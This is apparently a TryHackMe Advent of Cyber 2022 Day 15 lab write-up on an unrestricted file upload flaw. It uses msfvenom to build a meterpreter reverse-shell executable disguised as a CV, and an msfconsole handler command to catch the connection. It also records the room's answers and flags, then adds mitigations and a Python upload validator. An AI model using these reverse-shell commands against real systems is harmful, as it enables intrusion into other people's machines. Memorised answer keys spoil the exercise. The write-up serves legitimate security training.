Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.
Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.
Start the machine and paste its IP address into a browser. If needed, connect to the TryHackMe VPN first.
With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF).
Ans: Unrestricted
Ans: Santasidekick2
Just upload a dummy file to see how the form responds.
cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!
The message above confirms that a person will review the file, so we can upload a payload and wait for the interaction.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe
Let's start the reverse handler:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"
Let's upload the payload we created in the home directory to the website and wait for the interaction.
We got the reverse connection!
Now let's exploit.
We land in the system32 directory, so let's move back up to the C: drive and then into the HR elf's Documents folder:
cd ..
cd ..
cd Users
cd HR_Elf
cd Documents
cat flag.txt
Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}
To ensure that only specific file types can be uploaded, we can verify the file extension. This allows us to limit the types of files that are accepted.
Ans: File Extension Validation
Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.
To counter these attempts, we can rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name.
Ans: File Renaming
There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!
In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file.
Ans: Malware Scanning
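The three mitigations above (extension validation, file renaming and malware scanning) combined into one upload handler, written as an added example for this write-up rather than code from the room or from TryHackMe. The allowlist, the magic-byte check on the file header, the `demo_scanner` stand-in for a real engine such as ClamAV, and the sample uploads in `demo()` are all constructed assumptions; in production the scanner callable is where a ClamAV call would go.

```python
import secrets
import tempfile
from pathlib import Path, PurePosixPath
from typing import Callable, Dict, Optional, Tuple

# Constructed allowlist for a CV upload form: extension -> bytes a genuine file
# of that type starts with. Checking the header catches "cv.exe" renamed to "cv.pdf".
ALLOWED_TYPES = {
    ".pdf": b"%PDF-",
    ".docx": b"PK\x03\x04",  # DOCX is a ZIP container
}

# Standard EICAR anti-virus test string (harmless; every AV engine flags it).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def demo_scanner(content: bytes) -> bool:
    """Constructed stand-in for ClamAV: True means 'treat as malicious'.

    Flags the EICAR test string and a PE executable header ("MZ"). The magic-byte
    check normally rejects executables first; the scanner is a second layer.
    """
    return EICAR in content or content.startswith(b"MZ")


def validate_upload(
    filename: str,
    content: bytes,
    scanner: Callable[[bytes], bool] = demo_scanner,
) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, validated_extension)."""
    # Keep only the final path component so "../../evil.pdf" cannot steer the write.
    name = PurePosixPath(filename.replace("\\", "/")).name
    ext = Path(name).suffix.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed", None
    # Extension claims PDF/DOCX; the first bytes must agree.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type", None
    # Malware scan of the full content (ClamAV in a real deployment).
    if scanner(content):
        return False, "malware detected", None
    return True, "ok", ext


def store_upload(
    filename: str,
    content: bytes,
    storage_dir: str,
    scanner: Callable[[bytes], bool] = demo_scanner,
) -> Tuple[Optional[str], str]:
    """Validate, then write under a random name in storage_dir (kept outside the web root)."""
    accepted, reason, ext = validate_upload(filename, content, scanner)
    if not accepted:
        return None, reason
    # Random name: the uploader can no longer guess the stored path to reach the file.
    stored_name = secrets.token_hex(16) + ext
    (Path(storage_dir) / stored_name).write_bytes(content)
    return stored_name, reason


def demo() -> Dict[str, Tuple[bool, str, Optional[str]]]:
    """Run the handler over constructed sample uploads; returns name -> (accepted, reason, stored_name)."""
    samples = {
        "cv-username.exe": b"MZ\x90\x00" + b"\x00" * 60,  # what the write-up uploaded
        "cv.exe.pdf": b"MZ\x90\x00" + b"\x00" * 60,       # executable with a .pdf extension
        "eicar.pdf": b"%PDF-1.4\n" + EICAR,               # valid header, malicious body
        "../../evil.pdf": b"%PDF-1.4\n%%EOF",             # traversal attempt in the name
        "resume.pdf": b"%PDF-1.4\n%%EOF",                 # benign CV
    }
    results = {}
    with tempfile.TemporaryDirectory() as storage:
        for name, data in samples.items():
            stored, reason = store_upload(name, data, storage)
            results[name] = (stored is not None, reason, stored)
    return results


if __name__ == "__main__":
    for name, (accepted, reason, stored) in demo().items():
        print(f"{name:18} accepted={accepted!s:5} reason={reason!r} stored_as={stored}")
```

Each layer catches a different trick: the allowlist rejects `cv-username.exe` outright, the header check rejects the same bytes uploaded as `cv.exe.pdf`, and the scanner rejects a well-formed PDF that carries a flagged payload. Files that pass are written under a random hex name, so even if a file-inclusion bug existed elsewhere, the attacker would not know which path to include.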
Thank you for reading!
Happy hacking ~
Queries: THM, TryHackMe, TryHackMe Advent of Cyber 2022, TryHackMe Advent of Cyber 4 Day 15, Ethical Hacking, Write-up, Walkthrough, TryHackMe Advent of Cyber 2022 Day 15 Answers